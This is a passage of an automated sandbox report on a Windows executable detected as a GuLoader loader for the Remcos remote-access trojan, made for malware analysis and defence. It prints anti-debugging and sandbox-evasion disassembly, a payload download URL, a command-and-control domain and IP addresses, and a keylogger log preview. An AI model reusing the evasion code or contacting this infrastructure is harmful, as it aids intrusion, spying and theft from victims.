      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeRDTSC instruction interceptor: First address: 0000000000567D0C second address: 0000000000567D0C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00B1C905h 0x00000007 xor eax, AE894D5Ah 0x0000000c xor eax, 9A90F0F9h 0x00000011 add eax, CB578B5Bh 0x00000016 cpuid 0x00000018 test ch, dh 0x0000001a popad 0x0000001b call 00007F7AFC46132Bh 0x00000020 lfence 0x00000023 mov edx, 770EC33Bh 0x00000028 sub edx, 4238A07Dh 0x0000002e xor edx, 9CFEAEA4h 0x00000034 xor edx, D7D68C0Eh 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f jmp 00007F7AFC461409h 0x00000044 test ch, ah 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a add edi, edx 0x0000004c dec dword ptr [ebp+000000F8h] 0x00000052 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000059 jne 00007F7AFC46130Ah 0x0000005b cmp edx, eax 0x0000005d call 00007F7AFC46136Ch 0x00000062 call 00007F7AFC46134Eh 0x00000067 lfence 0x0000006a mov edx, 770EC33Bh 0x0000006f sub edx, 4238A07Dh 0x00000075 xor edx, 9CFEAEA4h 0x0000007b xor edx, D7D68C0Eh 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 jmp 00007F7AFC461409h 0x0000008b test ch, ah 0x0000008d ret 0x0000008e mov esi, edx 0x00000090 pushad 0x00000091 rdtsc
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeRDTSC instruction interceptor: First address: 0000000000567E99 second address: 0000000000567E99 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, FE410F8Bh 0x00000013 xor eax, 50497853h 0x00000018 xor eax, DF92CCE2h 0x0000001d add eax, 8E6544C7h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F7AFC9FB65Eh 0x0000002e cmp edx, eax 0x00000030 popad 0x00000031 test esi, 5A8E86D2h 0x00000037 call 00007F7AFC9FB141h 0x0000003c lfence 0x0000003f rdtsc
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeRDTSC instruction interceptor: First address: 0000000000562D9E second address: 000000000056734C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push ebx 0x00000004 cmp bx, cx 0x00000007 mov ebx, dword ptr [ebp+000001E5h] 0x0000000d mov dword ptr [ebp+0000023Eh], edi 0x00000013 mov edi, ebx 0x00000015 push edi 0x00000016 mov edi, dword ptr [ebp+0000023Eh] 0x0000001c test cx, ax 0x0000001f mov dword ptr [ebp+00000277h], ecx 0x00000025 mov ecx, edi 0x00000027 push ecx 0x00000028 cmp bx, cx 0x0000002b mov ecx, dword ptr [ebp+00000277h] 0x00000031 call 00007F7AFC465881h 0x00000036 mov ecx, dword ptr [esp+0Ch] 0x0000003a mov edx, dword ptr [esp+08h] 0x0000003e mov ebx, dword ptr [esp+04h] 0x00000042 test ecx, ecx 0x00000044 je 00007F7AFC461338h 0x00000046 test eax, ecx 0x00000048 mov al, byte ptr [edx] 0x0000004a mov byte ptr [ebx], al 0x0000004c pushad 0x0000004d mov ecx, 00000009h 0x00000052 rdtsc
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F8680 rdtsc
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeWindow / User API: threadDelayed 9146
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeWindow / User API: foregroundWindowGot 461
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe TID: 6408Thread sleep count: 9146 > 30
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe TID: 6408Thread sleep time: -45730s >= -30000s
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeThread sleep count: Count: 9146 delay: -5
      Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
      Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
      Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp, LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeSystem information queried: ModuleInformation

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F8680 rdtsc
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F6562 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F8680 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F5461 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F78E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F2CF2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F735B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F37D8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeProcess created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'
      Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: logs.dat.13.drBinary or memory string: [ Program Manager ]
      Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_00401A45 cpuid

      Stealing of Sensitive Information:

      barindex
      GuLoader behavior detectedShow sources
      Source: Initial fileSignature Results: GuLoader behavior
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection12Masquerading1Input Capture11Security Software Discovery621Remote ServicesInput Capture11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion23LSASS MemoryVirtualization/Sandbox Evasion23Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol212Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery312VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      LzbZ4T1iV8.exe18%VirustotalBrowse
      LzbZ4T1iV8.exe18%ReversingLabsWin32.Trojan.Vebzenpak
      LzbZ4T1iV8.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://101.99.94.119/WEALTH_PRUuqVZw139.bin1%VirustotalBrowse
      http://101.99.94.119/WEALTH_PRUuqVZw139.bin0%Avira URL Cloudsafe
      http://101.99.94.119/WEALTH_PRUuqVZw139.bin^0%Avira URL Cloudsafe
      http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dllMozilla/5.00%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      wealthyrem.ddns.net
      194.5.97.128
      truetrue
        unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://101.99.94.119/WEALTH_PRUuqVZw139.bintrue
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://101.99.94.119/WEALTH_PRUuqVZw139.bin^true
        • Avira URL Cloud: safe
        unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dllMozilla/5.0LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown

        Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public

        IPDomainCountryFlagASNASN NameMalicious
        194.5.97.128
        wealthyrem.ddns.netNetherlands
        208476DANILENKODEtrue
        101.99.94.119
        unknownMalaysia
        45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYtrue

        General Information

        Joe Sandbox Version:33.0.0 White Diamond
        Analysis ID:458125
        Start date:02.08.2021
        Start time:21:16:24
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 11m 17s
        Hypervisor based Inspection enabled:false
        Report type:light
        Sample file name:LzbZ4T1iV8.exe
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Run name:Suspected Instruction Hammering Hide Perf
        Number of analysed new started processes analysed:29
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.spyw.evad.winEXE@3/1@1/2
        EGA Information:Failed
        HDC Information:
        • Successful, ratio: 37% (good quality ratio 15.7%)
        • Quality average: 21.8%
        • Quality standard deviation: 28.5%
        HCA Information:Failed
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .exe
        Warnings:
        Show All
        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
        • TCP Packets have been reduced to 100
        • Excluded IPs from analysis (whitelisted): 104.42.151.234, 20.50.102.62, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.190.160.4, 20.190.160.132, 20.190.160.6, 20.190.160.69, 20.190.160.2, 20.190.160.73, 20.190.160.75, 20.190.160.67, 93.184.220.29, 51.104.136.2, 51.11.168.232
        • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, www.tm.lg.prod.aadmsa.akadns.net, settings-win.data.microsoft.com, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Behavior and APIs

        No simulations

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        194.5.97.128kGSHiWbgq9.exeGet hashmaliciousBrowse
          loKmeabs9V.exeGet hashmaliciousBrowse
            101.99.94.119kGSHiWbgq9.exeGet hashmaliciousBrowse
            • 101.99.94.119/WEALTH_PRUuqVZw139.bin
            loKmeabs9V.exeGet hashmaliciousBrowse
            • 101.99.94.119/WEALTH_PRUuqVZw139.bin

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            wealthyrem.ddns.netkGSHiWbgq9.exeGet hashmaliciousBrowse
            • 194.5.97.128
            loKmeabs9V.exeGet hashmaliciousBrowse
            • 194.5.97.128

            ASN

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYkGSHiWbgq9.exeGet hashmaliciousBrowse
            • 101.99.94.119
            loKmeabs9V.exeGet hashmaliciousBrowse
            • 101.99.94.119
            Audio #Ud83d#Udcde lifewire.org.HTMLGet hashmaliciousBrowse
            • 111.90.141.176
            bitratencrypt.exeGet hashmaliciousBrowse
            • 111.90.149.108
            svchost.exeGet hashmaliciousBrowse
            • 111.90.149.108
            eVF243bmXC.exeGet hashmaliciousBrowse
            • 111.90.149.108
            xSnF0lxFUX.exeGet hashmaliciousBrowse
            • 111.90.146.149
            QppmM7JmZd.exeGet hashmaliciousBrowse
            • 111.90.146.149
            vNiyRd4GcH.exeGet hashmaliciousBrowse
            • 111.90.146.149
            4E825059CDC8C2116FF7737EEAD0E6482A2CBF0A5790D.exeGet hashmaliciousBrowse
            • 111.90.146.149
            SecuriteInfo.com.Trojan.Win32.Save.a.2038.exeGet hashmaliciousBrowse
            • 101.99.94.204
            Minutes of Meeting 22062021.exeGet hashmaliciousBrowse
            • 111.90.147.240
            naxpJ9fFZ4.exeGet hashmaliciousBrowse
            • 111.90.149.115
            dMH1IIv1a1.exeGet hashmaliciousBrowse
            • 111.90.149.115
            bmaphis@cardinaltek.com_16465506 AMDocAtt.HTMLGet hashmaliciousBrowse
            • 111.90.140.91
            4cDyOofgzT.xlsmGet hashmaliciousBrowse
            • 101.99.95.230
            4cDyOofgzT.xlsmGet hashmaliciousBrowse
            • 101.99.95.230
            341288734918_06172021.xlsmGet hashmaliciousBrowse
            • 101.99.95.230
            341288734918_06172021.xlsmGet hashmaliciousBrowse
            • 101.99.95.230
            kctD8brhzU.exeGet hashmaliciousBrowse
            • 111.90.146.149
            DANILENKODEkGSHiWbgq9.exeGet hashmaliciousBrowse
            • 194.5.97.128
            loKmeabs9V.exeGet hashmaliciousBrowse
            • 194.5.97.128
            1niECmfIcE.exeGet hashmaliciousBrowse
            • 194.5.97.94
            Nuzbcdoajgupgalxelbnohzzeonlplvuro.exeGet hashmaliciousBrowse
            • 194.5.98.7
            RueoUfi1MZ.exeGet hashmaliciousBrowse
            • 194.5.98.3
            Departamento de contadores Consejos de pago 0.exeGet hashmaliciousBrowse
            • 194.5.98.7
            04_extracted.exeGet hashmaliciousBrowse
            • 194.5.97.18
            scanorder01321.jarGet hashmaliciousBrowse
            • 194.5.98.243
            scanorder01321.jarGet hashmaliciousBrowse
            • 194.5.98.243
            PO.exeGet hashmaliciousBrowse
            • 194.5.98.23
            PO B4007121.exeGet hashmaliciousBrowse
            • 194.5.98.7
            WzOSphO1Np.exeGet hashmaliciousBrowse
            • 194.5.98.107
            QUOTATION-007222021.exeGet hashmaliciousBrowse
            • 194.5.97.145
            PO B4007121.exeGet hashmaliciousBrowse
            • 194.5.98.7
            ORDER407-395.exeGet hashmaliciousBrowse
            • 194.5.98.23
            Bank Copy.pdf.exeGet hashmaliciousBrowse
            • 194.5.98.8
            FATURAA No.072221.exeGet hashmaliciousBrowse
            • 194.5.98.158
            Document.1-xml.eml.exeGet hashmaliciousBrowse
            • 194.5.98.136
            2 ( P-O DRAWINGS ) SUPPLY PRODUCT.exeGet hashmaliciousBrowse
            • 194.5.98.212
            ynFBVCYIcu.exeGet hashmaliciousBrowse
            • 194.5.98.195

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Roaming\remcos\logs.dat
            Process:C:\Users\user\Desktop\LzbZ4T1iV8.exe
            File Type:data
            Category:dropped
            Size (bytes):148
            Entropy (8bit):3.3453987070874214
            Encrypted:false
            SSDEEP:3:rklKlmvNcWKlRNU5JWRal2Jl+7R0DAlBG4LNQblovDl9il:IlKIazlbU5YcIeeDAlybW/G
            MD5:526F50323013D504471A1ACE38B89693
            SHA1:1D2CB4B5DADA7C1036CDBB57F350F2F318E5DBDF
            SHA-256:ACD440D4CB49505D3F6479A3BA54F12C5D5071D28F38A5038A98EBEFC7F1C987
            SHA-512:6F97E249C67F013EEF04E73C5A46E99EAD1FF8231E8FB2337E7CEFFD386BE4AE21DFEBC13C7CDF2680A884E431E08DF43621B1F51D9ACAD7A9CBCAA3946877E0
            Malicious:false
            Reputation:low
            Preview: ....[.2.0.2.1./.0.8./.0.2. .2.1.:.1.8.:.5.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r. .].....

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):6.659892921422715
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.15%
            • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:LzbZ4T1iV8.exe
            File size:114688
            MD5:41e1bc9de5f3b61639fb88143e933ff8
            SHA1:432531c5a0f7f82b8ec10e7f3fde1b51ebd3d0e8
            SHA256:d32cf33f8f64824f799ca44e9988ddc517e88db1235f93792d3ed2ddaa48e35f
            SHA512:75135a1977450f914d77247938987ee40b45443ebb187ff7b7a2b1c83f9b1f32744b0ccdefecc7df20ec4be01543bac216fc56de8fbf18448625140c1b4264fe
            SSDEEP:1536:rI3BiEocy06WRx+Hfzae+8S6JxdQC+gz6DN1QmiPYlmcy06W++eI3B:rEvBD2C6byC+g6NzlVB++
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....TU.................@..........D........P....@................

            File Icon

            Icon Hash:352d25253517a525

            Static PE Info

            General

            Entrypoint:0x401144
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            DLL Characteristics:
            Time Stamp:0x555407E7 [Thu May 14 02:26:47 2015 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:5565993a5a9f2bfb76f28ab304be6bc1

            Entrypoint Preview

            Instruction
            push 00406B40h
            call 00007F7AFCA82725h
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            xor byte ptr [eax], al
            add byte ptr [eax], al
            inc eax
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [ecx], ah
            or dword ptr [edi+512C9312h], ebx
            inc edx
            test eax, FF47123Eh
            add dl, byte ptr [ebx-07h]
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add dword ptr [eax], eax
            add byte ptr [eax], al
            inc edx
            add byte ptr [esi], al
            push eax
            add dword ptr [ecx], 53h
            push ebp
            inc edx
            dec ecx
            dec esi
            inc esi
            inc ebp
            push ebp
            inc esp
            inc ecx
            push esp
            inc ebp
            add byte ptr [eax], ch
            or eax, dword ptr [ebx]
            add byte ptr [eax], al
            add byte ptr [eax], al
            dec esp
            xor dword ptr [eax], eax
            pop es
            pop edi
            push ecx
            xchg eax, edx
            add ebp, esp
            inc ebp
            fiadd dword ptr [ecx-78h]
            jp 00007F7AFCA826D5h
            arpl word ptr [esi-5Dh], bx
            daa
            push 0000005Fh
            adc al, 07h
            pop ds
            enter 7288h, 4Dh
            stosb
            ret
            jp 00007F7AFCA82776h
            fdivr qword ptr [edi+4F3AAE67h]
            lodsd
            xor ebx, dword ptr [ecx-48EE309Ah]
            or al, 00h
            stosb
            add byte ptr [eax-2Dh], ah
            xchg eax, ebx
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            push edx
            pop ecx
            add byte ptr [eax], al
            sub byte ptr [eax+00h], bl
            add byte ptr [eax], al
            or eax, dword ptr [eax]
            push eax
            inc ecx
            dec esp
            dec esp
            inc edx
            inc ebp
            inc ecx
            push edx
            inc ebp
            push edx
            push ebx
            add byte ptr [43000701h], cl
            inc ebp
            dec ebp

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x14b740x28.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x170000x5b9e.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
            IMAGE_DIRECTORY_ENTRY_IAT0x10000x7c.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x13df40x14000False0.652099609375data7.08169017725IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .data0x150000x115c0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
            .rsrc0x170000x5b9e0x6000False0.545817057292data6.02928789817IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountry
            RT_ICON0x1bcf60xea8data
            RT_ICON0x1b44e0x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 3457162792, next used block 3459124259
            RT_ICON0x1aee60x568GLS_BINARY_LSB_FIRST
            RT_ICON0x1893e0x25a8data
            RT_ICON0x178960x10a8data
            RT_ICON0x1742e0x468GLS_BINARY_LSB_FIRST
            RT_GROUP_ICON0x173d40x5adata
            RT_VERSION0x171e00x1f4dataChineseTaiwan

            Imports

            DLLImport
            MSVBVM60.DLL_CIcos, _adj_fptan, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp

            Version Infos

            DescriptionData
            Translation0x0404 0x04b0
            ProductVersion1.00
            InternalNameGYMNOSPERMAE
            FileVersion1.00
            OriginalFilenameGYMNOSPERMAE.exe
            ProductNameCOMANAGE

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            ChineseTaiwan

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Aug 2, 2021 21:20:11.784956932 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:11.833715916 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:11.833933115 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:11.882823944 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:11.882945061 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:11.932694912 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:11.932858944 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:11.932898045 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:11.932940960 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:11.932944059 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:11.932969093 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:11.933052063 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:11.982657909 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:11.982708931 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:11.982744932 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:11.982781887 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:11.982825994 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:11.982825041 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:11.982887030 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:11.982904911 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:11.982945919 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:11.982996941 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:11.983000994 CEST8049766101.99.94.119192.168.2.4
            Aug 2, 2021 21:20:11.983074903 CEST4976680192.168.2.4101.99.94.119
            Aug 2, 2021 21:20:11.983122110 CEST4976680192.168.2.4101.99.94.119
